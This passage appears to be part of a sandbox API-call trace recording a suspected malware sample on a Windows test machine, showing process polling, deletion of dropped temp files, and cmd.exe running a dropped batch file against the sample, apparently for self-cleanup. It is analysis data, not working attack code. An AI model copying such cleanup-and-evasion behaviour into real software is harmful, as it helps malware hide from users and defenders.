[0112.357] Sleep (dwMilliseconds=0x19) [0112.408] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.408] Sleep (dwMilliseconds=0x19) [0112.482] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.482] Sleep (dwMilliseconds=0x19) [0112.579] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.579] Sleep (dwMilliseconds=0x19) [0112.675] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.675] Sleep (dwMilliseconds=0x19) [0112.721] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.722] Sleep (dwMilliseconds=0x19) [0112.803] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.803] Sleep (dwMilliseconds=0x19) [0112.852] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.853] Sleep (dwMilliseconds=0x19) [0112.913] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.913] Sleep (dwMilliseconds=0x19) [0113.005] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.005] Sleep (dwMilliseconds=0x19) [0113.098] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.098] Sleep (dwMilliseconds=0x19) [0113.151] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.151] Sleep (dwMilliseconds=0x19) [0113.206] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.206] Sleep (dwMilliseconds=0x19) [0113.241] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.241] Sleep (dwMilliseconds=0x19) [0113.309] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.309] Sleep (dwMilliseconds=0x19) [0113.344] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.344] Sleep (dwMilliseconds=0x19) [0113.392] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.392] Sleep (dwMilliseconds=0x19) [0113.429] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.429] Sleep (dwMilliseconds=0x19) [0114.386] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.386] Sleep (dwMilliseconds=0x19) [0114.484] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.484] Sleep (dwMilliseconds=0x19) [0114.548] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.549] Sleep (dwMilliseconds=0x19) [0114.683] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.684] Sleep (dwMilliseconds=0x19) [0114.901] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.901] Sleep (dwMilliseconds=0x19) [0114.974] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.974] Sleep (dwMilliseconds=0x19) [0115.054] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.054] Sleep (dwMilliseconds=0x19) [0115.221] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.221] Sleep (dwMilliseconds=0x19) [0115.339] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.339] Sleep (dwMilliseconds=0x19) [0115.446] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.447] Sleep (dwMilliseconds=0x19) [0115.497] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.497] Sleep (dwMilliseconds=0x19) [0115.595] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.595] Sleep (dwMilliseconds=0x19) [0115.656] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.656] Sleep (dwMilliseconds=0x19) [0115.817] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.817] Sleep (dwMilliseconds=0x19) [0116.007] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.007] Sleep (dwMilliseconds=0x19) [0116.092] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.092] Sleep (dwMilliseconds=0x19) [0116.203] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.203] Sleep (dwMilliseconds=0x19) [0116.406] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.406] Sleep (dwMilliseconds=0x19) [0116.500] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.500] Sleep (dwMilliseconds=0x19) [0116.577] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.577] Sleep (dwMilliseconds=0x19) [0116.748] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.748] Sleep (dwMilliseconds=0x19) [0116.871] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.871] Sleep (dwMilliseconds=0x19) [0116.967] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.967] Sleep (dwMilliseconds=0x19) [0117.213] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.213] Sleep (dwMilliseconds=0x19) [0117.532] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.533] Sleep (dwMilliseconds=0x19) [0117.706] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.706] Sleep (dwMilliseconds=0x19) [0117.973] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.973] Sleep (dwMilliseconds=0x19) [0118.228] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.228] Sleep (dwMilliseconds=0x19) [0118.775] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.775] Sleep (dwMilliseconds=0x19) [0119.112] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.112] Sleep (dwMilliseconds=0x19) [0119.446] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.446] Sleep (dwMilliseconds=0x19) [0119.709] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.709] Sleep (dwMilliseconds=0x19) [0119.959] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.959] Sleep (dwMilliseconds=0x19) [0120.078] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.078] Sleep (dwMilliseconds=0x19) [0120.125] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.125] Sleep (dwMilliseconds=0x19) [0120.181] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.181] Sleep (dwMilliseconds=0x19) [0120.243] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.243] Sleep (dwMilliseconds=0x19) [0120.424] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x0) returned 1 [0120.426] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69110 | out: hHeap=0x2a60000) returned 1 [0120.427] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a692c0 | out: hHeap=0x2a60000) returned 1 [0120.427] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6b080 | out: hHeap=0x2a60000) returned 1 [0120.427] GetLastError () returned 0x0 [0120.427] SetLastError (dwErrCode=0x0) [0120.427] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCC.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcc.tmp")) returned 1 [0120.428] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\extd.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\extd.exe")) returned 0 [0120.430] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat")) returned 1 [0120.431] RemoveDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp")) returned 1 [0120.432] RemoveDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp")) returned 1 [0120.433] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x409890 [0120.433] HeapDestroy (hHeap=0x10e0000) returned 1 [0120.652] HeapDestroy (hHeap=0x2a60000) returned 1 [0120.653] HeapDestroy (hHeap=0x2a90000) returned 1 [0120.660] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x1118 Thread: id = 3 os_tid = 0xcd8 Thread: id = 4 os_tid = 0x1190 Thread: id = 5 os_tid = 0xe70 Thread: id = 6 os_tid = 0x1198 Thread: id = 7 os_tid = 0x11b4 Thread: id = 8 os_tid = 0x11ac Thread: id = 9 os_tid = 0x11a8 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 10 os_tid = 0x9bc Thread: id = 11 os_tid = 0x7ec Thread: id = 12 os_tid = 0x770 Thread: id = 13 os_tid = 0x7d8 Thread: id = 14 os_tid = 0x698 Thread: id = 15 os_tid = 0x690 Thread: id = 16 os_tid = 0x5fc Thread: id = 17 os_tid = 0x5f8 Thread: id = 18 os_tid = 0x5f4 Thread: id = 19 os_tid = 0x5b4 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0xaa46000" os_pid = "0x348" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xd08" cmd_line = "\"C:\\WINDOWS\\sysnative\\cmd.exe\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0x1208 [0097.948] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67b8d0000 [0097.948] __set_app_type (_Type=0x1) [0097.948] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67b8e6d00) returned 0x0 [0097.948] __getmainargs (in: _Argc=0x7ff67b909200, _Argv=0x7ff67b909208, _Env=0x7ff67b909210, _DoWildCard=0, _StartInfo=0x7ff67b90921c | out: _Argc=0x7ff67b909200, _Argv=0x7ff67b909208, _Env=0x7ff67b909210) returned 0 [0097.948] _onexit (_Func=0x7ff67b8e7fd0) returned 0x7ff67b8e7fd0 [0097.949] _onexit (_Func=0x7ff67b8e7fe0) returned 0x7ff67b8e7fe0 [0097.949] _onexit (_Func=0x7ff67b8e7ff0) returned 0x7ff67b8e7ff0 [0097.949] _onexit (_Func=0x7ff67b8e8000) returned 0x7ff67b8e8000 [0097.949] _onexit (_Func=0x7ff67b8e8010) returned 0x7ff67b8e8010 [0097.950] _onexit (_Func=0x7ff67b8e8020) returned 0x7ff67b8e8020 [0097.950] GetCurrentThreadId () returned 0x1208 [0097.950] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1208) returned 0x7c [0097.950] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0097.950] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0097.950] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.029] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.029] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x407419fca8 | out: phkResult=0x407419fca8*=0x0) returned 0x2 [0098.030] VirtualQuery (in: lpAddress=0x407419fc94, lpBuffer=0x407419fc10, dwLength=0x30 | out: lpBuffer=0x407419fc10*(BaseAddress=0x407419f000, AllocationBase=0x40740a0000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.030] VirtualQuery (in: lpAddress=0x40740a0000, lpBuffer=0x407419fc10, dwLength=0x30 | out: lpBuffer=0x407419fc10*(BaseAddress=0x40740a0000, AllocationBase=0x40740a0000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.030] VirtualQuery (in: lpAddress=0x40740a1000, lpBuffer=0x407419fc10, dwLength=0x30 | out: lpBuffer=0x407419fc10*(BaseAddress=0x40740a1000, AllocationBase=0x40740a0000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.030] VirtualQuery (in: lpAddress=0x40740a4000, lpBuffer=0x407419fc10, dwLength=0x30 | out: lpBuffer=0x407419fc10*(BaseAddress=0x40740a4000, AllocationBase=0x40740a0000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.030] VirtualQuery (in: lpAddress=0x40741a0000, lpBuffer=0x407419fc10, dwLength=0x30 | out: lpBuffer=0x407419fc10*(BaseAddress=0x40741a0000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xffff9302, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0098.030] GetConsoleOutputCP () returned 0x1b5 [0098.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0098.239] SetConsoleCtrlHandler (HandlerRoutine=0x7ff67b8f8150, Add=1) returned 1 [0098.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.239] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc04 | out: lpMode=0x7ff67b90fc04) returned 1 [0098.371] _get_osfhandle (_FileHandle=0) returned 0x4c [0098.371] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc00 | out: lpMode=0x7ff67b90fc00) returned 1 [0098.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.474] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x0) returned 1 [0098.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0098.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.827] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0098.968] _get_osfhandle (_FileHandle=0) returned 0x4c [0098.968] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0099.197] _get_osfhandle (_FileHandle=0) returned 0x4c [0099.197] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0099.288] GetEnvironmentStringsW () returned 0x1dc256b5f40* [0099.288] GetProcessHeap () returned 0x1dc256b0000 [0099.288] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe4c) returned 0x1dc256b6da0 [0099.288] FreeEnvironmentStringsA (penv="A") returned 1 [0099.288] GetProcessHeap () returned 0x1dc256b0000 [0099.288] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x8) returned 0x1dc256b7c00 [0099.288] GetEnvironmentStringsW () returned 0x1dc256b5f40* [0099.288] GetProcessHeap () returned 0x1dc256b0000 [0099.288] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe4c) returned 0x1dc256b7c20 [0099.289] FreeEnvironmentStringsA (penv="A") returned 1 [0099.289] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x407419eb58 | out: phkResult=0x407419eb58*=0x88) returned 0x0 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x0, lpData=0x407419eb70*=0x66, lpcbData=0x407419eb54*=0x1000) returned 0x2 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x1, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x0, lpData=0x407419eb70*=0x1, lpcbData=0x407419eb54*=0x1000) returned 0x2 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x0, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x40, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x40, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.289] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x0, lpData=0x407419eb70*=0x40, lpcbData=0x407419eb54*=0x1000) returned 0x2 [0099.289] RegCloseKey (hKey=0x88) returned 0x0 [0099.289] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x407419eb58 | out: phkResult=0x407419eb58*=0x88) returned 0x0 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x0, lpData=0x407419eb70*=0x40, lpcbData=0x407419eb54*=0x1000) returned 0x2 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x1, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x0, lpData=0x407419eb70*=0x1, lpcbData=0x407419eb54*=0x1000) returned 0x2 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x0, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x9, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x4, lpData=0x407419eb70*=0x9, lpcbData=0x407419eb54*=0x4) returned 0x0 [0099.290] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x407419eb50, lpData=0x407419eb70, lpcbData=0x407419eb54*=0x1000 | out: lpType=0x407419eb50*=0x0, lpData=0x407419eb70*=0x9, lpcbData=0x407419eb54*=0x1000) returned 0x2 [0099.290] RegCloseKey (hKey=0x88) returned 0x0 [0099.290] time (in: timer=0x0 | out: timer=0x0) returned 0x5f47c24a [0099.290] srand (_Seed=0x5f47c24a) [0099.290] GetCommandLineW () returned="\"C:\\WINDOWS\\sysnative\\cmd.exe\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"" [0099.290] malloc (_Size=0x4000) returned 0x1dc255c5910 [0099.291] GetCommandLineW () returned="\"C:\\WINDOWS\\sysnative\\cmd.exe\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"" [0099.291] malloc (_Size=0xffce) returned 0x1dc257b0080 [0099.292] ??_V@YAXPEAX@Z () returned 0x1dc257b0080 [0099.292] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0099.292] malloc (_Size=0xffce) returned 0x1dc257c0060 [0099.293] ??_V@YAXPEAX@Z () returned 0x1dc257c0060 [0099.294] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1dc257c0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.294] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0099.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.294] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.294] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.294] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.294] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.294] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.294] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.294] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.294] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.294] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.295] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.295] GetProcessHeap () returned 0x1dc256b0000 [0099.295] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b6da0) returned 1 [0099.295] GetEnvironmentStringsW () returned 0x1dc256b5f40* [0099.295] GetProcessHeap () returned 0x1dc256b0000 [0099.295] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe64) returned 0x1dc256b8ab0 [0099.295] FreeEnvironmentStringsA (penv="A") returned 1 